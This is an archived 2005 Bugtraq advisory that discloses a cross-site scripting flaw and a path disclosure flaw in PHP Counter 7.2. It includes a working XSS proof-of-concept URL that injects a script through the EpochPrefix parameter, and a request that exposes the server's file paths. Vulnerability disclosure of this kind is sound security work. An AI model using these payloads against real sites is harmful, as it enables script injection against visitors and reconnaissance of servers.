Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Path Disclosure and XSS problem in PHP Counter 7.2

From: "priestmaster" <priest () priestmaster org>
Date: Wed, 13 Jul 2005 12:53:04 +0200
Hi,

I found two vulnerabillities in PHP Counter 7.2

PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php

First an XSS problem (file phpcounterxss.txt)
Second a Path disclosure vulnerabillity (file phpcounterdir.txt).

greets,

priestmaster

Mail: <priest () priestmaster org>
URL:  http://www.priestmaster.org 
             

----------------------------------------------------------
---- Team priestmasters PHP Counter 7.2 XSS Advisorie ----
----------------------------------------------------------

PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php

PHP Counter 7.2 does not filter "<>" tags in EpochPrefix
parameter. Cross site scripting and HTML injection is possible.

Exploitation:

http://www.yourwebsite.org/CounterDirectory/index.php?Plugin=All%20Hits&EpochPrefix=";></a></div><script>a=/XSS/%0aalert(a.source)</script>

The injected script is called multiple times.

XSS is hard to do because ' and " are filtered.

greets,

priestmaster

URL:   http://www.priestmaster.org
Email: priest () priestmaster org

------------------------------------------------------------
-------- Team priestasters PHP Counter 7.2 Advisorie -------
---------------- Path disclosure vulnerabillity ------------
------------------------------------------------------------

PHP Counter Vendor:
http://www.ekstreme.com/phplabs/phpcounter.php

A Path disclosure vuln exist in prelims.php
Exploitation is simple:

http://www.yoursite.com/CounterPath/prelims.php

Output look like this:

Fatal error: Call to undefined function: getdawn()
in /home/.sites/165/site223/web/Counter/prelims.php on line 63

That's all :-)

priestmaster
Previous By Date Next
Previous By Thread Next

Current thread: